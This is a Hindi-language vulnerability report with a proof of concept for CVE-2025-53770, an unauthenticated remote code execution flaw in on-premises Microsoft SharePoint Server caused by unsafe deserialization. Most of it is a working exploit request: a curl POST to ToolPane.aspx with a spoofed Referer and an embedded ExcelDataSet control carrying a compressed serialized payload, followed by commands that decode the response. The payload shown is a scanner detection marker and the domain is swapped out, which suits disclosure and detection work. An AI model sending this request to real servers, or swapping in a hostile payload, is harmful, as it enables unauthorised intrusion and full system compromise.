
Microsoft SharePoint Server में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से असत्यापित दूरस्थ कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट (CVE-2025-53770), जिसमें पेलोड निष्कर्षण और डीकोडिंग कमांड शामिल हैं।
Critical — Microsoft SharePoint Server में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन (CVE-2025-53770)
ऑन-प्रिमाइसेस Microsoft SharePoint Server में अविश्वसनीय डेटा का डिसीरियलाइज़ेशन एक हमलावर को दूरस्थ रूप से कोड निष्पादित करने और सिस्टम से समझौता करने की अनुमति देता है। Microsoft सक्रिय शोषण से अवगत है और एक व्यापक अद्यतन तैयार कर रहा है। सुनिश्चित करें कि CVE दस्तावेज़ीकरण से शमन उपाय मौजूद हैं।
निम्नलिखित PoC दर्शाता है कि कैसे एक हमलावर कमजोर एंडपॉइंट के माध्यम से दुर्भावनापूर्ण पेलोड निकालने और डिकोड करने के लिए भेद्यता का शोषण कर सकता है।
लक्ष्य डोमेन को जानबूझकर reeaccated.com से बदल दिया गया है।
curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
-H 'Referer: /_layouts/SignOut.aspx' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
--data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
</div>
</ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable="\K[^&]+(?=")' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'
<Info>IntruderScannerDetectionPayload</Info>

प्रभाव:
बिना प्रमाणीकरण के हमलावर SharePoint Server पर असुरक्षित डिसीरियलाइज़ेशन का शोषण करके रिमोट कोड निष्पादन प्राप्त कर सकते हैं, जिससे पूर्ण सिस्टम से समझौता हो सकता है।